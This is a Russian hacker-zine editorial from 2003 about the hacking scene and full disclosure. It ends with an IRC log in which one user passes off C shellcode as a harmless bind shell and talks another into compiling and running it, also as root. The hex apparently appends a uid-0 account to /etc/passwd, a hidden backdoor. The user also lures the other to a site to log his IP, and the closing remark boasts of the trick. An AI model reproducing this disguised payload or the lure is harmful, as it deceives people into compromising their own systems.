Эта статья философского характера, мы просто решили порассуждать на тему "куда катится RU-сцена". N0w видимо стало модным поднимать эту тему - уже в двух новых зинах (FDS и Dark Deamon)были такие статьи. Что тут сказать, учитывая хотя бы то сколько ошибок в даргоне ( ака Dark Deamon aka Дурагон - как сказал кто-то из наших ;)). Все вдруг посчитали что хакеры всего мира должны сплотиться и чё-то там устроить. Понеслись вселенские лозунги, типа спасём рунет, сцену, etc.. А дальше слов дело как всегда не заходит ! Многие как только найдут уязвимость в каком либо продукте сразу шлют во все рассылки advisory. Прошло время hack teamz но теперь стали плодиться бесчисленные cewl security teamz. Всё посчитали что full disclosure это круто, это безопасно. Только вот script-кидисов меньше не становится...
После появления статьи про приватные зоны на nteam.ru у некоторых могло возникнуть ложное впечатление что вот оно, решение - попрятать все сплоиты, а адвизори сделать общедоступными. Но это тоже не выход (хотя приятно когда знаешь
где можно "позаимствовать" нужный stuff )). Security spertz получают немалые деньги за то, что ищут баги в варезе. Их считают элитой, хотя для них уже давно главную роль играют деньги. Это уже не сцена, а их "сфера экономики". Мля.. >;Pp
А где же сейчас реальная сцена? А вы её и не видете. Хотя нет, ошибка.Вы часто слышите о появлении новых червей, вирусов ( не тупых вордовых или сгенерённых ), взломах крупных проектов неизвестными людьми. "Обнадёживающий" BQ неожиданно для
кучи кидисов и админов выдал m00-mod_gzip.c.. Не говоря про то, сколько фанатов появилось у му. Была продемонстрироана обратная сторона full-disclosure ;)) А ведь похожие вещи случались и до этого - трояны в сплоитах, etc.. Короче, к чему мы клоним - поменьше слов, побольше дела.
Недавно мы набрели на сайт зина LmD и были приятно удивлены - после прочтения трёх номеров (ждём четвёртый )) остались отличные впечатления. Доки там в таком old-sch00l'ьном стиле что прям повеяло стариной )) Респект, парни!
Жаль журнала не хватает, чтобы выразить все мысли... Но мы надеемся, что хоть кто-то оценит нашу работу. old_school, n3w\x20sCh001... Эти понятия очень, очень относительные. Что такое blackhat тоже многие знают смутно. Для нас это человек, занимающийся взломами только для себя. Делиться инфой _нужно_, но не мы не даём готовых ready2use вещей. Кто хочет, тот поймёт. Это не сфера обслуживания и если вам не нравится то что мы делаем закройте рот (lovchy, ur NOT our fuckin client) и не мешайте.
"Let tell you something, I'LL PUSH YOU BACK!!"
(c) Interloper, Slipknot 1999
>>> P.S. 2 movl: на тему кто из нас ламак. Это была глюкавая бета, но факт - ты попробывал его. Логи старые, просто попались под руку. Так что не ори, что мы сакс, а ты cewl-HaX0r.
eXORc157: check force (Nov 15 2003)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
03:31:24 <eX0Rc157> yo, man!
03:32:04 <eX0Rc157> ur online?
[movl has address ~movl@217.21.59.176]
03:32:05 <movl> yo
03:32:24 <movl> yeah :)
03:32:30 <eX0Rc157> =)
03:32:35 <eX0Rc157> ti v linuxe?
03:32:49 <eX0Rc157> if "y" mozesh pomoch?
03:32:52 <movl> da
03:33:10 <movl> a v chem trabla?
03:33:11 <eX0Rc157> a kakaya veria?
03:33:13 <eX0Rc157> a kakaya versia?
03:33:27 <movl> Mandrake 8.2
03:33:41 <eX0Rc157> o, kputo
03:34:28 <movl> tak tebe zachem?
03:34:59 <eX0Rc157> #include <stdio.h>
03:34:59 <eX0Rc157>
03:34:59 <eX0Rc157> char bindshellcode[] =
03:34:59 <eX0Rc157> "\x31\xC0\x50\x68\x73\x73\x77\x64\x68\x63\x2F\x70\x61"
03:34:59 <eX0Rc157> "\x68\x2F\x2F\x65\x74\x89\xE3\x66\xB9\x01\x04\xB0\x05"
03:34:59 <eX0Rc157> "\xCD\x80\x89\xC3\x31\xC0\x50\x68\x2F\x73\x68\x0A\x68"
03:34:59 <eX0Rc157> "\x2F\x62\x69\x6E\x68\x74\x6D\x70\x3A\x68\x3A\x33\x3A"
03:34:59 <eX0Rc157> "\x2F\x68\x38\x36\x3A\x30\x68\x73\x3A\x3A\x39\x68\x2F"
03:34:59 <eX0Rc157> "\x73\x68\x0A\x68\x2F\x62\x69\x6E\x68\x6C\x69\x62\x3A"
03:34:59 <eX0Rc157> "\x68\x36\x36\x3A\x2F\x68\x3A\x30\x3A\x36\x68\x6D\x3A"
03:34:59 <eX0Rc157> "\x3A\x30\x89\xE1\xB2\x30\xB0\x04\xCD\x80\x31\xC0\xB0"
03:34:59 <eX0Rc157> "\x06\xCD\x80\x31\xC0\x40\xCD\x80";
03:34:59 <eX0Rc157>
03:34:59 <eX0Rc157> int
03:34:59 <eX0Rc157> main()
03:34:59 <eX0Rc157> {
03:34:59 <eX0Rc157> void (*funct) ();
03:34:59 <eX0Rc157> (long) funct = &bindshellcode;
03:34:59 <eX0Rc157> funct();
03:34:59 <eX0Rc157> }
03:35:03 <eX0Rc157> shellcode potestit
03:35:19 <eX0Rc157> on slushaet port a potom prosto virubaetsa
03:35:38 <eX0Rc157> gcc -o x86 x86.c; netstat -an | grep 3133
03:35:57 <eX0Rc157> esli uvidish LISTEN, znachit vorkaet shellcode
03:36:08 <eX0Rc157> mozesh pomoch s etim?
03:36:18 <movl> ok
03:37:08 <eX0Rc157> nu kak?
03:37:31 <movl> seichas
**** ENDING LOGGING AT Sat Nov 15 03:37:36 2003
**** BEGIN LOGGING AT Sat Nov 15 03:37:36 2003
03:38:44 <movl> nifiga
03:38:49 <eX0Rc157> fuck...
03:39:00 <eX0Rc157> navernoe s parametramy socket'a pereboshil...
03:39:04 <eX0Rc157> SPASIBO
03:39:17 <eX0Rc157> mlah, a to nikto protestit ne mog
03:39:39 <eX0Rc157> budu chitat manz ;)
03:39:52 <movl> da nezashto
03:41:40 <eX0Rc157> a kakoi u tebia irc-client?
03:41:49 <eX0Rc157> pod X?
03:41:55 <movl> ugu
03:42:07 <eX0Rc157> x-chat?
03:42:13 <movl> irssi ne prikalivaet
03:42:27 <movl> slushai a tebe zachem?
03:42:47 <eX0Rc157> uchus codit
03:43:11 <movl> i kak?
03:43:20 <eX0Rc157> da kak vidish ne ochen ;)
03:43:46 <eX0Rc157> pod freebsd pishu shellcodz, a pod linux- ne katit
03:44:18 <eX0Rc157> a ti chem zanimaeshsya?
03:44:20 <movl> paradox, pod frjahu trudnee pisat' po idee
03:44:37 <eX0Rc157> nea, esli ti s nei rabotaesh postoyanno ;)
03:44:47 <movl> da chem pridetsa :)
03:44:54 <eX0Rc157> a s linxuom kak to malo stalkivalsa
03:45:07 <eX0Rc157> ti coder?
03:46:05 <movl> nu kak skazat', ja sam seichas itayus' shellcodi pisat'
03:46:11 <movl> nu kak skazat', ja sam seichas pitayus' shellcodi pisat'
03:46:26 <eX0Rc157> nu i kak?
03:46:33 <eX0Rc157> poluchaetsa?
03:46:53 <movl> poka primerno tozhe samoe, chto i u tebja :)
03:47:13 <eX0Rc157> heh
03:47:31 <eX0Rc157> a u tebya comp doma? ili ti na shelle sidish?
03:48:02 <movl> nu na eto ja otvechat' ne budu :)
03:48:14 <eX0Rc157> i eshe, zabil sprosit - arch x86?
03:48:33 <eX0Rc157> a to mozet m68 ili 4e to drugoe?
03:48:43 <eX0Rc157> ;)
03:48:44 <movl> x86
03:48:47 <eX0Rc157> hmm
03:48:52 <eX0Rc157> lana, stranno
03:49:21 <movl> a chto po idee dolzhen bil rabotat'?
03:49:42 <eX0Rc157> aga
03:49:54 <eX0Rc157> prosto slushat port
03:50:06 <eX0Rc157> a kogda k nemu conect - on padaet
03:50:44 <movl> escho raz proveril voobshe ego ne proslushivaet
03:51:49 <eX0Rc157> da, ploho...
03:53:27 <eX0Rc157> a ti iz m00? ;)
03:53:39 <eX0Rc157> tipa m00vl ;)
03:54:09 <movl> net :)))
03:54:12 <eX0Rc157> hehe
04:01:48 <eX0Rc157> mda...
04:02:03 <movl> chto?
04:02:07 <eX0Rc157> a v mandrake 8.2 lynx est?
04:02:37 <movl> est'
04:02:38 <eX0Rc157> ti ksta pod rootom zapuskal shellcode?
04:02:46 <movl> on vo vseh linuhah est'
04:02:57 <eX0Rc157> aga, no voobshe hz
04:03:07 <eX0Rc157> nabey 'lynx iii.h11.ru'
04:03:11 <eX0Rc157> just 4 expl
04:03:15 <movl> da net pod prostim
04:03:30 <eX0Rc157> potom prover pod rootom
04:03:33 <eX0Rc157> hotya...
04:03:35 <eX0Rc157> hz
04:03:38 <movl> a chto tam?
04:03:56 <eX0Rc157> mozet s socket'ami root mozet toka rabotat - port 1-1024
04:04:03 <eX0Rc157> prover
04:04:18 <eX0Rc157> vozmozno ya port postavil vmesto 3133 133 ;)
04:04:35 <movl> :)
04:05:01 <eX0Rc157> ruki iz zopi rstut mlah ;)
04:05:34 <movl> nu otkril
04:05:59 <movl> tam statija pro vvedenie v perepolnenie bufera
04:06:31 <eX0Rc157> v lynx'e otkril?
04:06:51 <movl> da
04:06:56 <eX0Rc157> tam prostp tag <xml>
04:07:03 <eX0Rc157> normalno vidno?
04:07:13 <eX0Rc157> u menya gluchilo =)
04:07:25 <eX0Rc157> ya nah mozillu zapustil =)
04:07:36 <movl> vse ok
04:07:42 <eX0Rc157> kputo
04:08:10 <eX0Rc157> potest pod rootom shellcode
04:08:14 <eX0Rc157> plz ;)
04:08:31 <movl> ok
04:08:52 <movl> port 3133? ili vse-take net? :)
Всего за 30 минут общения ты успел потестить мой шеллкод, засветить свой ip
(access.log best), да ещё и рассказать о своей системе. В следующий раз прежде
чем орать что-либо подумай как следует, или хотя бы аргументируй свой трёп )) |